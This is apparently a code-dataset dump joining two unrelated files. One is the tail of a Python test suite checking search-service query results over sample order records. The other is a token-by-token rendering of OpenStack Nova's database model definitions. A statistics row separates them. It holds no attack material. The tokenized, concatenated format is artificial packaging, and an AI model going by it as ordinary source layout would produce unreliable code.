def test_service_search_42_query_deep_nested_generic_field(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":".city:pittsburgh _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.city:pittsburgh _bucket:orders', u'documents': [{u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.343752, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.288369, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'004', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.271476, u'shipping': {u'city': u'san francisco', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/15/2015', u'total': 450}], u'num_results': 3}, "Actual Response : %r" % json_response
def test_service_search_43_query_deep_nested_generic_field_and_numeric_gt(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":".cost:>50 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.cost:>50 _bucket:orders', u'documents': [{u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 2}, "Actual Response : %r" % json_response
def test_service_search_44_query_deep_nested_generic_field_and_numeric_range(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":".cost:>84.1&<84.9 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.cost:>84.1&<84.9 _bucket:orders', u'documents': [{u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 2}, "Actual Response : %r" % json_response
def test_service_search_45_query_deep_nested_generic_field_with_quote(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":'.city:"los angeles" _bucket:orders'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.city:"los angeles" _bucket:orders', u'documents': [{u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.486139, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}, {u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 0.446299, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.407815, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}], u'num_results': 3}, "Actual Response : %r" % json_response
def test_service_search_46_query_date_greaterthan(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"order_date:>07/01/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'order_date:>07/01/2015 _bucket:orders', u'documents': [{u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 1.633233, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.432004, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 4}, "Actual Response : %r" % json_response
def test_service_search_47_query_date_range(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"order_date:>07/01/2015&<11/01/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'order_date:>07/01/2015&<11/01/2015 _bucket:orders', u'documents': [{u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.432004, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 3}, "Actual Response : %r" % json_response
def test_service_search_48_query_date_lessthan(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"order_date:<11/01/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'order_date:<11/01/2015 _bucket:orders', u'documents': [{u'_id': u'005', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 2.392164, u'shipping': {u'city': u'florida', u'state': u'fl'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 50}, {u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.865009, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.432004, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'004', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.320535, u'shipping': {u'city': u'san francisco', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/15/2015', u'total': 450}], u'num_results': 6}, "Actual Response : %r" % json_response
def test_service_search_49_query_date_with_nested_field_format_1(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"shipping.shipping_date:Oct/02/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'shipping.shipping_date:Oct/02/2015 _bucket:orders', u'documents': [{u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_50_query_date_with_nested_field_format_2(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"shipping.shipping_date:=Oct/02/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'shipping.shipping_date:=Oct/02/2015 _bucket:orders', u'documents': [{u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_51_query_date_with_nested_field_format_3(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":".shipping_date:=Oct/02/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.shipping_date:=Oct/02/2015 _bucket:orders', u'documents': [{u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_52_query_date_range_with_nested_field(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":".shipping_date:>=Oct/02/2015&<=Oct/02/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.shipping_date:>=Oct/02/2015&<=Oct/02/2015 _bucket:orders', u'documents': [{u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_53_query_date_with_invalid_nested_field_should_return_nothing(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"shipping_date:=Oct/02/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'shipping_date:=Oct/02/2015 _bucket:orders', u'documents': [], u'num_results': 0}, "Actual Response : %r" % json_response
def test_service_search_54_query_numeric_operator_gt_negative(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:>-250 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:>-250 _bucket:orders', u'documents': [{u'_id': u'005', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 2.392164, u'shipping': {u'city': u'florida', u'state': u'fl'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 50}, {u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.865009, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}, {u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 1.633233, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.432004, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'004', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.320535, u'shipping': {u'city': u'san francisco', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/15/2015', u'total': 450}], u'num_results': 7}, "Actual Response : %r" % json_response
def test_service_search_55_query_numeric_operator_range_negative(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:>-250&<=50 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:>-250&<=50 _bucket:orders', u'documents': [{u'_id': u'005', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 2.392164, u'shipping': {u'city': u'florida', u'state': u'fl'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 50}, {u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 3}, "Actual Response : %r" % json_response
def test_service_search_56_query_boolean_operator(self):
self.run_before_service_searcher_tests_boolean_field_search()
response = self.app.post('/service/search', data=json.dumps({"q":".shipped:=true _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.shipped:=true _bucket:orders', u'documents': [{u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.344435, u'shipping': {u'city': u'los angeles', u'state': u'ca', u'shipped': True}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_57_query_boolean_operator(self):
self.run_before_service_searcher_tests_boolean_field_search()
response = self.app.post('/service/search', data=json.dumps({"q":".shipped:=false _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.shipped:=false _bucket:orders', u'documents': [{u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.671488, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipped': False}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 1}, "Actual Response : %r" % json_response
| 92.144026 | 1,731 | 0.668028 | 8,301 | 56,300 | 4.31442 | 0.03602 | 0.115932 | 0.059474 | 0.075334 | 0.940973 | 0.934858 | 0.929636 | 0.924638 | 0.920003 | 0.914838 | 0 | 0.041576 | 0.131474 | 56,300 | 610 | 1,732 | 92.295082 | 0.690846 | 0.003144 | 0 | 0.601485 | 0 | 0.044554 | 0.355059 | 0.008626 | 0 | 0 | 0 | 0 | 0.351485 | 1 | 0.153465 | false | 0 | 0.004951 | 0 | 0.160891 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a481ccfef841c54a4a9cfcc2aea3992442acf0b2 | 20,919 | py | Python | nova/db/sqlalchemy/api_models.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/db/sqlalchemy/api_models.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/db/sqlalchemy/api_models.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | 2 | 2017-07-20T17:31:34.000Z | 2020-07-24T02:42:19.000Z | begin_unit
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
nl|'\n'
name|'from'
name|'oslo_db'
op|'.'
name|'sqlalchemy'
name|'import'
name|'models'
newline|'\n'
name|'from'
name|'sqlalchemy'
name|'import'
name|'Boolean'
newline|'\n'
name|'from'
name|'sqlalchemy'
name|'import'
name|'Column'
newline|'\n'
name|'from'
name|'sqlalchemy'
name|'import'
name|'Enum'
newline|'\n'
name|'from'
name|'sqlalchemy'
op|'.'
name|'ext'
op|'.'
name|'declarative'
name|'import'
name|'declarative_base'
newline|'\n'
name|'from'
name|'sqlalchemy'
name|'import'
name|'Float'
newline|'\n'
name|'from'
name|'sqlalchemy'
name|'import'
name|'ForeignKey'
newline|'\n'
name|'from'
name|'sqlalchemy'
name|'import'
name|'Index'
newline|'\n'
name|'from'
name|'sqlalchemy'
name|'import'
name|'Integer'
newline|'\n'
name|'from'
name|'sqlalchemy'
name|'import'
name|'orm'
newline|'\n'
name|'from'
name|'sqlalchemy'
op|'.'
name|'orm'
name|'import'
name|'backref'
newline|'\n'
name|'from'
name|'sqlalchemy'
name|'import'
name|'schema'
newline|'\n'
name|'from'
name|'sqlalchemy'
name|'import'
name|'String'
newline|'\n'
name|'from'
name|'sqlalchemy'
name|'import'
name|'Text'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
op|'.'
name|'db'
op|'.'
name|'sqlalchemy'
name|'import'
name|'types'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|_NovaAPIBase
name|'class'
name|'_NovaAPIBase'
op|'('
name|'models'
op|'.'
name|'ModelBase'
op|','
name|'models'
op|'.'
name|'TimestampMixin'
op|')'
op|':'
newline|'\n'
indent|' '
name|'pass'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|variable|API_BASE
dedent|''
name|'API_BASE'
op|'='
name|'declarative_base'
op|'('
name|'cls'
op|'='
name|'_NovaAPIBase'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|CellMapping
name|'class'
name|'CellMapping'
op|'('
name|'API_BASE'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Contains information on communicating with a cell"""'
newline|'\n'
DECL|variable|__tablename__
name|'__tablename__'
op|'='
string|"'cell_mappings'"
newline|'\n'
DECL|variable|__table_args__
name|'__table_args__'
op|'='
op|'('
name|'Index'
op|'('
string|"'uuid_idx'"
op|','
string|"'uuid'"
op|')'
op|','
nl|'\n'
name|'schema'
op|'.'
name|'UniqueConstraint'
op|'('
string|"'uuid'"
op|','
nl|'\n'
DECL|variable|name
name|'name'
op|'='
string|"'uniq_cell_mappings0uuid'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|variable|id
name|'id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'primary_key'
op|'='
name|'True'
op|')'
newline|'\n'
DECL|variable|uuid
name|'uuid'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'36'
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|name
name|'name'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|')'
newline|'\n'
DECL|variable|transport_url
name|'transport_url'
op|'='
name|'Column'
op|'('
name|'Text'
op|'('
op|')'
op|')'
newline|'\n'
DECL|variable|database_connection
name|'database_connection'
op|'='
name|'Column'
op|'('
name|'Text'
op|'('
op|')'
op|')'
newline|'\n'
DECL|variable|host_mapping
name|'host_mapping'
op|'='
name|'orm'
op|'.'
name|'relationship'
op|'('
string|"'HostMapping'"
op|','
nl|'\n'
DECL|variable|backref
name|'backref'
op|'='
name|'backref'
op|'('
string|"'cell_mapping'"
op|','
name|'uselist'
op|'='
name|'False'
op|')'
op|','
nl|'\n'
DECL|variable|foreign_keys
name|'foreign_keys'
op|'='
name|'id'
op|','
nl|'\n'
DECL|variable|primaryjoin
name|'primaryjoin'
op|'='
op|'('
nl|'\n'
string|"'CellMapping.id == HostMapping.cell_id'"
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|InstanceMapping
dedent|''
name|'class'
name|'InstanceMapping'
op|'('
name|'API_BASE'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Contains the mapping of an instance to which cell it is in"""'
newline|'\n'
DECL|variable|__tablename__
name|'__tablename__'
op|'='
string|"'instance_mappings'"
newline|'\n'
DECL|variable|__table_args__
name|'__table_args__'
op|'='
op|'('
name|'Index'
op|'('
string|"'project_id_idx'"
op|','
string|"'project_id'"
op|')'
op|','
nl|'\n'
name|'Index'
op|'('
string|"'instance_uuid_idx'"
op|','
string|"'instance_uuid'"
op|')'
op|','
nl|'\n'
name|'schema'
op|'.'
name|'UniqueConstraint'
op|'('
string|"'instance_uuid'"
op|','
nl|'\n'
DECL|variable|name
name|'name'
op|'='
string|"'uniq_instance_mappings0instance_uuid'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|variable|id
name|'id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'primary_key'
op|'='
name|'True'
op|')'
newline|'\n'
DECL|variable|instance_uuid
name|'instance_uuid'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'36'
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|cell_id
name|'cell_id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'ForeignKey'
op|'('
string|"'cell_mappings.id'"
op|')'
op|','
nl|'\n'
DECL|variable|nullable
name|'nullable'
op|'='
name|'True'
op|')'
newline|'\n'
DECL|variable|project_id
name|'project_id'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|cell_mapping
name|'cell_mapping'
op|'='
name|'orm'
op|'.'
name|'relationship'
op|'('
string|"'CellMapping'"
op|','
nl|'\n'
DECL|variable|backref
name|'backref'
op|'='
name|'backref'
op|'('
string|"'instance_mapping'"
op|','
name|'uselist'
op|'='
name|'False'
op|')'
op|','
nl|'\n'
DECL|variable|foreign_keys
name|'foreign_keys'
op|'='
name|'cell_id'
op|','
nl|'\n'
DECL|variable|primaryjoin
name|'primaryjoin'
op|'='
op|'('
string|"'InstanceMapping.cell_id == CellMapping.id'"
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|HostMapping
dedent|''
name|'class'
name|'HostMapping'
op|'('
name|'API_BASE'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Contains mapping of a compute host to which cell it is in"""'
newline|'\n'
DECL|variable|__tablename__
name|'__tablename__'
op|'='
string|'"host_mappings"'
newline|'\n'
DECL|variable|__table_args__
name|'__table_args__'
op|'='
op|'('
name|'Index'
op|'('
string|"'host_idx'"
op|','
string|"'host'"
op|')'
op|','
nl|'\n'
name|'schema'
op|'.'
name|'UniqueConstraint'
op|'('
string|"'host'"
op|','
nl|'\n'
DECL|variable|name
name|'name'
op|'='
string|"'uniq_host_mappings0host'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|variable|id
name|'id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'primary_key'
op|'='
name|'True'
op|')'
newline|'\n'
DECL|variable|cell_id
name|'cell_id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'ForeignKey'
op|'('
string|"'cell_mappings.id'"
op|')'
op|','
nl|'\n'
DECL|variable|nullable
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|host
name|'host'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|RequestSpec
dedent|''
name|'class'
name|'RequestSpec'
op|'('
name|'API_BASE'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Represents the information passed to the scheduler."""'
newline|'\n'
nl|'\n'
DECL|variable|__tablename__
name|'__tablename__'
op|'='
string|"'request_specs'"
newline|'\n'
DECL|variable|__table_args__
name|'__table_args__'
op|'='
op|'('
nl|'\n'
name|'Index'
op|'('
string|"'request_spec_instance_uuid_idx'"
op|','
string|"'instance_uuid'"
op|')'
op|','
nl|'\n'
name|'schema'
op|'.'
name|'UniqueConstraint'
op|'('
string|"'instance_uuid'"
op|','
nl|'\n'
DECL|variable|name
name|'name'
op|'='
string|"'uniq_request_specs0instance_uuid'"
op|')'
op|','
nl|'\n'
op|')'
newline|'\n'
nl|'\n'
DECL|variable|id
name|'id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'primary_key'
op|'='
name|'True'
op|')'
newline|'\n'
DECL|variable|instance_uuid
name|'instance_uuid'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'36'
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|spec
name|'spec'
op|'='
name|'Column'
op|'('
name|'Text'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|build_request
name|'build_request'
op|'='
name|'orm'
op|'.'
name|'relationship'
op|'('
string|"'BuildRequest'"
op|','
nl|'\n'
DECL|variable|back_populates
name|'back_populates'
op|'='
string|"'request_spec'"
op|','
nl|'\n'
DECL|variable|uselist
name|'uselist'
op|'='
name|'False'
op|','
nl|'\n'
DECL|variable|primaryjoin
name|'primaryjoin'
op|'='
op|'('
nl|'\n'
string|"'RequestSpec.id == BuildRequest.request_spec_id'"
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|Flavors
dedent|''
name|'class'
name|'Flavors'
op|'('
name|'API_BASE'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Represents possible flavors for instances"""'
newline|'\n'
DECL|variable|__tablename__
name|'__tablename__'
op|'='
string|"'flavors'"
newline|'\n'
DECL|variable|__table_args__
name|'__table_args__'
op|'='
op|'('
nl|'\n'
name|'schema'
op|'.'
name|'UniqueConstraint'
op|'('
string|'"flavorid"'
op|','
name|'name'
op|'='
string|'"uniq_flavors0flavorid"'
op|')'
op|','
nl|'\n'
name|'schema'
op|'.'
name|'UniqueConstraint'
op|'('
string|'"name"'
op|','
name|'name'
op|'='
string|'"uniq_flavors0name"'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|variable|id
name|'id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'primary_key'
op|'='
name|'True'
op|')'
newline|'\n'
DECL|variable|name
name|'name'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|memory_mb
name|'memory_mb'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
